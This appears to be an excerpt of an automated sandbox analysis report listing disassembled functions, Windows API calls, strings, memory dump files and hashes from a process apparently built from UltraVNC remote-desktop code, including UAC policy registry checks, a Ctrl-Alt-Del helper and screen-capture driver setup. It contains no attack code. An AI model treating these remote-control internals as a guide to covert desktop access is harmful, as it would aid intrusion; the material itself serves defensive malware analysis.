SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00007FF74001A45C
UltraVNC Warning, xrefs: 00007FF74001A669
vistahook.cpp : OpenInputdesktop OK, xrefs: 00007FF74001A1A4
UAC is Disable, make registry changes to allow cad, xrefs: 00007FF74001A283
Ctrl-alt-del require service, no permission, xrefs: 00007FF74001A5E3
cad.exe, xrefs: 00007FF74001A599
EnableLUA, xrefs: 00007FF74001A496
Global\SessionEventUltraCad, xrefs: 00007FF74001A414, 00007FF74001A4CC
-softwarecadhelper, xrefs: 00007FF74001A335
vistahook.cpp : OpenInputdesktop Error , xrefs: 00007FF74001A19B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 1732492099-311746058
Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
Instruction ID: b0b8f5723447af8f4f9a94e0026f11ca1c66edc0d64c21f4d3690b142aee3259
Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
Instruction Fuzzy Hash: A2F13971A0CB42C5EB24BB21A8442A9B3A5FF85754F844236DA6D57BB8EF3DF504C720

Function 00007FF740014C10 Relevance: 77.4, APIs: 42, Strings: 2, Instructions: 357windowCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF740014C41
SetWindowLongPtrA.USER32 ref: 00007FF740014C89
EndDialog.USER32 ref: 00007FF740014CA2
_snprintf.LIBCMT ref: 00007FF740014CD0
_snprintf.LIBCMT ref: 00007FF740014D0E
SetWindowTextA.USER32 ref: 00007FF740014D1B
SetDlgItemTextA.USER32 ref: 00007FF740014D3E
SendDlgItemMessageA.USER32 ref: 00007FF740014D72
LoadStringA.USER32 ref: 00007FF740014DCA
GetDlgItem.USER32 ref: 00007FF740014E16
GetScrollInfo.USER32 ref: 00007FF740014E29
SendDlgItemMessageA.USER32 ref: 00007FF740014E67
SetForegroundWindow.USER32 ref: 00007FF740014E70
GetDlgItem.USER32 ref: 00007FF740014E7E
GetWindowLongPtrA.USER32 ref: 00007FF740014E8C
GetDlgItem.USER32 ref: 00007FF740014EA3
SetWindowLongPtrA.USER32 ref: 00007FF740014EB4
GetDlgItem.USER32 ref: 00007FF740014EED
GetWindowRect.USER32 ref: 00007FF740014EFB
GetDlgItem.USER32 ref: 00007FF740014F2E
MoveWindow.USER32 ref: 00007FF740014F4F
GetDlgItem.USER32 ref: 00007FF740014F5D
MoveWindow.USER32 ref: 00007FF740014F83
GetDlgItem.USER32 ref: 00007FF740014F91
MoveWindow.USER32 ref: 00007FF740014FB4
GetDlgItem.USER32 ref: 00007FF740014FC2
MoveWindow.USER32 ref: 00007FF740014FE9
GetDlgItem.USER32 ref: 00007FF740014FF7
MoveWindow.USER32 ref: 00007FF74001501E
GetDlgItem.USER32 ref: 00007FF74001502C
MoveWindow.USER32 ref: 00007FF740015053
InvalidateRect.USER32 ref: 00007FF740015061
EndDialog.USER32 ref: 00007FF740015081
GetDlgItemTextA.USER32 ref: 00007FF7400150D7
ShowWindow.USER32 ref: 00007FF74001527C
SetForegroundWindow.USER32 ref: 00007FF740015286

Strings

Chat with <%s> - UltraVNC, xrefs: 00007FF740014CFD
MS Sans Serif, xrefs: 00007FF740014D47

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
String ID: Chat with <%s> - UltraVNC$MS Sans Serif
API String ID: 3122538718-446500584
Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
Instruction ID: 00e60424de5c2b6fcb3c358a783a9195607095e3609e31d84fec4fc2004f5e8e
Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
Instruction Fuzzy Hash: 69F16F76A0C642C6EB64BB26E404369A360FF89B94F844131DE5E0BBB8DF3DF5458760

Function 00007FF74002F980 Relevance: 65.1, APIs: 20, Strings: 17, Instructions: 347libraryloaderwindowCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF74002FA05
LoadLibraryA.KERNEL32 ref: 00007FF74002FA1A
GetProcAddress.KERNEL32 ref: 00007FF74002FA3E
FreeLibrary.KERNEL32 ref: 00007FF74002FBB2
EnumWindows.USER32 ref: 00007FF74002FBEF
GetDC.USER32 ref: 00007FF74002FC4A
CreateCompatibleDC.GDI32 ref: 00007FF74002FD6A
GetLastError.KERNEL32 ref: 00007FF74002FD7C
GetDeviceCaps.GDI32 ref: 00007FF74002FDC4
GetDeviceCaps.GDI32 ref: 00007FF74002FDFE
CreateCompatibleBitmap.GDI32 ref: 00007FF74002FE38
GetLastError.KERNEL32 ref: 00007FF74002FE4A
GetDIBits.GDI32 ref: 00007FF74002FED6

Strings

vncdesktop.cpp : No driver used , xrefs: 00007FF74002FBFE
vncdesktop.cpp : failed to create compatibleDC(%d), xrefs: 00007FF74002FD82
vncdesktop.cpp : unable to get display format, xrefs: 00007FF74002FEE0
vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver, xrefs: 00007FF74002FDD6
vncdesktop.cpp : got bitmap format, xrefs: 00007FF74002FF4B
vncdesktop.cpp : Failed m_rootdc , xrefs: 00007FF74002FC5C
mv video hook driver2, xrefs: 00007FF74002FAA8
vncdesktop.cpp : unable to get display colour info, xrefs: 00007FF74002FF33
vncdesktop.cpp : bitmap dimensions are %d x %d, xrefs: 00007FF74002FD4B
vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver, xrefs: 00007FF74002FE0F
vncdesktop.cpp : failed to create memory bitmap(%d), xrefs: 00007FF74002FE50
vncdesktop.cpp : created memory bitmap, xrefs: 00007FF74002FE72
EnumDisplayDevicesA, xrefs: 00007FF74002FA2C
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF74002FAED
WinVNC, xrefs: 00007FF74002FDCF, 00007FF74002FE08
DISPLAY, xrefs: 00007FF74002FB1E
USER32, xrefs: 00007FF74002FA0B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
API String ID: 3851920378-1343955350
Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
Instruction ID: e1b4b97772c7becb68eced7a0814c5cd9248b5fd87864f708770b698a182381c
Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
Instruction Fuzzy Hash: AD022A72A0C686C5EB14FF24E4406AAA7A1FF85B48F84443ADA0D5B7ACDF38E505D770

Function 00007FF740018980 Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 264registrythreadlibraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7400189B4
GetProcAddress.KERNEL32 ref: 00007FF7400189D8
EnumDisplaySettingsA.USER32 ref: 00007FF740018A24
wprintf.LIBCMT ref: 00007FF740018AA8
FreeLibrary.KERNEL32 ref: 00007FF740018AB0
wprintf.LIBCMT ref: 00007FF740018B21
RegCreateKeyA.ADVAPI32 ref: 00007FF740018BE3
RegCreateKeyA.ADVAPI32 ref: 00007FF740018C07
RegSetValueExA.ADVAPI32 ref: 00007FF740018C41
RegCloseKey.ADVAPI32 ref: 00007FF740018C54
RegCloseKey.ADVAPI32 ref: 00007FF740018C5F
RegCreateKeyA.ADVAPI32 ref: 00007FF740018C93
RegCreateKeyA.ADVAPI32 ref: 00007FF740018CB3
RegSetValueExA.ADVAPI32 ref: 00007FF740018CED
RegCloseKey.ADVAPI32 ref: 00007FF740018D00
RegCloseKey.ADVAPI32 ref: 00007FF740018D0B
GetCurrentThreadId.KERNEL32 ref: 00007FF740018D72
GetThreadDesktop.USER32 ref: 00007FF740018D7A
OpenInputDesktop.USER32 ref: 00007FF740018D92
SetThreadDesktop.USER32 ref: 00007FF740018DA3
ChangeDisplaySettingsExA.USER32 ref: 00007FF740018DC0
ChangeDisplaySettingsExA.USER32 ref: 00007FF740018DDA
SetThreadDesktop.USER32 ref: 00007FF740018DE8
CloseDesktop.USER32 ref: 00007FF740018DFA

Strings

SYSTEM, xrefs: 00007FF740018C65
No '%s' found., xrefs: 00007FF740018AA1
mv2, xrefs: 00007FF740018D2C
EnumDisplayDevicesA, xrefs: 00007FF7400189C6
SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2, xrefs: 00007FF740018BD0
DevNum:%dName:%sString:%sID:%sKey:%s, xrefs: 00007FF740018B12
USER32, xrefs: 00007FF7400189A7
SYSTEM\CurrentControlSet\Hardware Profiles\Current, xrefs: 00007FF740018C7D
\DEVICE, xrefs: 00007FF740018B32
DEVICE0, xrefs: 00007FF740018B60
Attach.ToDesktop, xrefs: 00007FF740018C1F, 00007FF740018CCB
mv video hook driver2, xrefs: 00007FF740018A74, 00007FF740018A9A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 4207610217-3713657650
Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
Instruction ID: c17c2e20d2a9a4bf04edd3098fa978671e63e9f093daebbe3c21561b3d957b44
Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
Instruction Fuzzy Hash: 7BC16361A1CA87C5EB60BB11A8506B9B7A4FF84744FC04035DA5E57BACEF3DE205C760

Function 00007FF740030330 Relevance: 56.2, APIs: 20, Strings: 12, Instructions: 220windowCOMMON

Download Yara Rule

APIs

GetSystemPaletteEntries.GDI32 ref: 00007FF7400303ED
CreatePalette.GDI32 ref: 00007FF740030403
SelectPalette.GDI32 ref: 00007FF740030447
DeleteObject.GDI32 ref: 00007FF740030475
RealizePalette.GDI32 ref: 00007FF7400304B5
DeleteObject.GDI32 ref: 00007FF7400304E3
GetSystemPaletteEntries.GDI32 ref: 00007FF740030524
CreateCompatibleDC.GDI32 ref: 00007FF7400305C5
GetLastError.KERNEL32 ref: 00007FF7400305D3
SelectObject.GDI32 ref: 00007FF740030602
GetLastError.KERNEL32 ref: 00007FF740030610
DeleteDC.GDI32 ref: 00007FF740030631
SetDIBColorTable.GDI32 ref: 00007FF74003064B
GetLastError.KERNEL32 ref: 00007FF740030655
SelectObject.GDI32 ref: 00007FF740030679
GetLastError.KERNEL32 ref: 00007FF740030684
DeleteObject.GDI32 ref: 00007FF7400306A5
DeleteDC.GDI32 ref: 00007FF7400306AE
DeleteObject.GDI32 ref: 00007FF7400306BE
DeleteDC.GDI32 ref: 00007FF7400306C7

Strings

vncdesktop.cpp : initialised palette OK, xrefs: 00007FF7400304E9
vncdesktop.cpp : no palette data for truecolour display, xrefs: 00007FF7400306D7
vncdesktop.cpp : unable to allocate logical palette, xrefs: 00007FF7400303B6
vncdesktop.cpp : unable to create HPALETTE, xrefs: 00007FF740030411
vncdesktop.cpp : framebuffer has %u palette entries, xrefs: 00007FF74003052A
vncdesktop.cpp : unable to create temporary DC, xrefs: 00007FF7400305D9
vncdesktop.cpp : unable to select() HPALETTE, xrefs: 00007FF740030455
vncdesktop.cpp : unable to restore temporary DC bitmap, xrefs: 00007FF74003068A
vncdesktop.cpp : unable to select DIB section into temporary DC, xrefs: 00007FF740030616
vncdesktop.cpp : warning - failed to RealizePalette, xrefs: 00007FF7400304C0
vncdesktop.cpp : unable to set DIB section palette, xrefs: 00007FF74003065B
vncdesktop.cpp : unable to get system palette entries, xrefs: 00007FF7400303F7

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
API String ID: 463275814-2693335352
Opcode ID: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
Instruction ID: afc94b82acd1d8ce586c107edc208cc473d9635f84f48d9e707b000427ee39cb
Opcode Fuzzy Hash: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
Instruction Fuzzy Hash: CBA18E65A0DA87C1FA15FB25A5143B9A3A1AF88B48FC44435C94E477B9DE3CF10AC770

Function 00007FF740018E10 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 272registrythreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740018E5C
GetProcAddress.KERNEL32 ref: 00007FF740018E78
EnumDisplaySettingsA.USER32 ref: 00007FF740018EB5
wprintf.LIBCMT ref: 00007FF740018F68
FreeLibrary.KERNEL32 ref: 00007FF740018F70
wprintf.LIBCMT ref: 00007FF740018FCF
RegCreateKeyA.ADVAPI32 ref: 00007FF740019096
RegCreateKeyA.ADVAPI32 ref: 00007FF7400190BA
RegSetValueExA.ADVAPI32 ref: 00007FF7400190F6
GetCurrentThreadId.KERNEL32 ref: 00007FF74001918E
GetThreadDesktop.USER32 ref: 00007FF740019196
OpenInputDesktop.USER32 ref: 00007FF7400191AE
SetThreadDesktop.USER32 ref: 00007FF7400191BF
ChangeDisplaySettingsExA.USER32 ref: 00007FF7400191DC
ChangeDisplaySettingsExA.USER32 ref: 00007FF7400191FE
SetThreadDesktop.USER32 ref: 00007FF74001920E
CloseDesktop.USER32 ref: 00007FF74001921C
RegCloseKey.ADVAPI32 ref: 00007FF740019227
RegCloseKey.ADVAPI32 ref: 00007FF740019232
FreeLibrary.KERNEL32 ref: 00007FF74001923B

Strings

No '%s' found., xrefs: 00007FF740018F61
mv2, xrefs: 00007FF740019121
EnumDisplayDevicesA, xrefs: 00007FF740018E6E
SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2, xrefs: 00007FF740019080
DevNum:%dName:%sString:%sID:%sKey:%s, xrefs: 00007FF740018FC0
USER32, xrefs: 00007FF740018E3E
\DEVICE, xrefs: 00007FF740018FE0
DEVICE0, xrefs: 00007FF74001900E
Attach.ToDesktop, xrefs: 00007FF7400190D7
mv video hook driver2, xrefs: 00007FF740018F34, 00007FF740018F5A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 27940619-3388178877
Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction ID: 838c2a80867a7738352d5560ccd58152a970c7b124241e94ede5f34a94e75d8d
Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction Fuzzy Hash: CAC17F22A0C682D5EB21FF25A8442A9B7A1FF44794F944135DA4E4B7ACEF3DF505C720

Function 00007FF740005A60 Relevance: 50.9, APIs: 17, Strings: 12, Instructions: 154libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740005AAE
GetModuleFileNameA.KERNEL32 ref: 00007FF740005B07
LoadLibraryA.KERNEL32 ref: 00007FF740005B84
GetProcAddress.KERNEL32 ref: 00007FF740005BA8
GetProcAddress.KERNEL32 ref: 00007FF740005BC3
GetProcAddress.KERNEL32 ref: 00007FF740005BDE
GetProcAddress.KERNEL32 ref: 00007FF740005BF9
GetProcAddress.KERNEL32 ref: 00007FF740005C14
GetProcAddress.KERNEL32 ref: 00007FF740005C2F
GetProcAddress.KERNEL32 ref: 00007FF740005C4A
GetProcAddress.KERNEL32 ref: 00007FF740005C65
GetProcAddress.KERNEL32 ref: 00007FF740005C80
GetProcAddress.KERNEL32 ref: 00007FF740005C9B
GetProcAddress.KERNEL32 ref: 00007FF740005CB6
GetProcAddress.KERNEL32 ref: 00007FF740005CD1
FreeLibrary.KERNEL32 ref: 00007FF740005D33
DeleteFileA.KERNEL32 ref: 00007FF740005D49

Strings

Startup, xrefs: 00007FF740005BB5
Config, xrefs: 00007FF740005CC3
CreateIntegratedPluginInterface, xrefs: 00007FF740005CA8
Reset, xrefs: 00007FF740005C72
TransformBuffer, xrefs: 00007FF740005C21
FreeBuffer, xrefs: 00007FF740005C57
SetParams, xrefs: 00007FF740005BEB
Description, xrefs: 00007FF740005BA1
RestoreBuffer, xrefs: 00007FF740005C3C
CreatePluginInterface, xrefs: 00007FF740005C8D
GetParams, xrefs: 00007FF740005C06
Shutdown, xrefs: 00007FF740005BD0

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
API String ID: 1650122287-1031704962
Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
Instruction ID: 649309f1ecd796c3fb49cd4abe7667019e2314a8457387f2dc070d025da2ffd6
Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
Instruction Fuzzy Hash: 9681F63591CA82D1EB11BF20E4543ADB3A0FB59B98F844132DA6D4B3A8DF78E644C330

Function 00007FF7400BA228 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328timeCOMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7400BA269
_errno.LIBCMT ref: 00007FF7400BA271
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400BA27C
_errno.LIBCMT ref: 00007FF7400BA29F
__doserrno.LIBCMT ref: 00007FF7400BA2AB
_getdrive.LIBCMT ref: 00007FF7400BA2D9
FindFirstFileExA.KERNEL32 ref: 00007FF7400BA2F8
_errno.LIBCMT ref: 00007FF7400BA326
_errno.LIBCMT ref: 00007FF7400BA32E
_errno.LIBCMT ref: 00007FF7400BA353
_errno.LIBCMT ref: 00007FF7400BA35D
_errno.LIBCMT ref: 00007FF7400BA36B
GetDriveTypeA.KERNEL32 ref: 00007FF7400BA447
free.LIBCMT ref: 00007FF7400BA45E
free.LIBCMT ref: 00007FF7400BA4B0
_errno.LIBCMT ref: 00007FF7400BA4B5
__doserrno.LIBCMT ref: 00007FF7400BA4C1
_wsopen_s.LIBCMT ref: 00007FF7400BA4FA
